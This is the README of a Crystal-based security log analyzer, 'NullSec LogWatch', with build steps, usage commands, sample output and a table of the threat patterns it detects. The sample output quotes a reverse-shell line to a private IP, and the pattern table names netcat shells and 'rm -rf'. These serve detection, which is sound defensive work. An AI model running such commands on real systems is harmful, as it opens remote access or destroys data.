Security Log Analyzer
Ruby-like elegance with static type safety
Features • Installation • Usage • Patterns
NullSec LogWatch is a security log analyzer written in Crystal. It scans log files for suspicious patterns including authentication failures, brute force attacks, malware indicators, and system anomalies.
- 📋 Log Analysis - Parse and analyze security logs
- 🔍 Pattern Matching - 20+ threat patterns
- 🎯 Severity Classification - Critical/High/Medium/Low
- 📊 Statistics - Summary of findings
- 📤 JSON Export - Machine-readable output
┌─────────────────────────────────────────────┐
│ NullSec LogWatch v2.0.0 │
├─────────────────────────────────────────────┤
│ ✓ Strong Static Typing │
│ ✓ Null Safety (Nil unions) │
│ ✓ Bounds-checked Arrays │
│ ✓ Memory Safety via GC │
│ ✓ Immutable Strings │
│ ✓ Result Types for Errors │
└─────────────────────────────────────────────┘
# Clone the repository
git clone https://github.com/bad-antics/nullsec-logwatch.git
cd nullsec-logwatch
# Build with Crystal
shards build --release
# Or compile directly
crystal build --release -o nullsec-logwatch logwatch.cr- Crystal 1.0 or later
# Analyze a log file
./nullsec-logwatch /var/log/auth.log
# Show all findings
./nullsec-logwatch --all /var/log/syslog
# JSON output
./nullsec-logwatch --json /var/log/messages
# Show help
./nullsec-logwatch --help██╗ ██████╗ ██████╗ ██╗ ██╗ █████╗ ████████╗ ██████╗██╗ ██╗
██║ ██╔═══██╗██╔════╝ ██║ ██║██╔══██╗╚══██╔══╝██╔════╝██║ ██║
██║ ██║ ██║██║ ███╗██║ █╗ ██║███████║ ██║ ██║ ███████║
██║ ██║ ██║██║ ██║██║███╗██║██╔══██║ ██║ ██║ ██╔══██║
███████╗╚██████╔╝╚██████╔╝╚███╔███╔╝██║ ██║ ██║ ╚██████╗██║ ██║
╚══════╝ ╚═════╝ ╚═════╝ ╚══╝╚══╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝
bad-antics • Security Log Analyzer
[*] Analyzing: /var/log/auth.log
[*] Analysis Statistics
Total Findings: 47
Critical: 3
High: 12
Medium: 18
Low: 14
[*] Security Findings
[Critical] Line 1847: Brute Force
Jan 22 14:32:15 - repeated login failures from 192.168.1.100...
[Critical] Line 2103: Shell Activity
Jan 22 15:45:22 - bash -i >& /dev/tcp/10.0.0.5/4444...
[High] Line 892: Auth Failure
Jan 22 10:15:33 - Failed password for invalid user admin...
[✗] Critical security events detected!
| Category | Severity | Patterns |
|---|---|---|
| Brute Force | Critical | Repeated failures, account lockout |
| Shell Activity | Critical | Reverse shell, bind shell, nc -e |
| Malware | Critical | Cryptominer, ransomware, backdoor |
| Auth Failure | High | Failed password, invalid user |
| Port Scan | High | nmap, masscan indicators |
| System Crash | High | Kernel panic, segfault |
| Privilege Change | Medium | sudo, su, setuid |
| File Deletion | Medium | rm -rf, shred |
NullSec Proprietary License
bad-antics
- GitHub: @bad-antics
- Website: bad-antics.github.io
- Discord: discord.gg/killers
Part of the NullSec Security Framework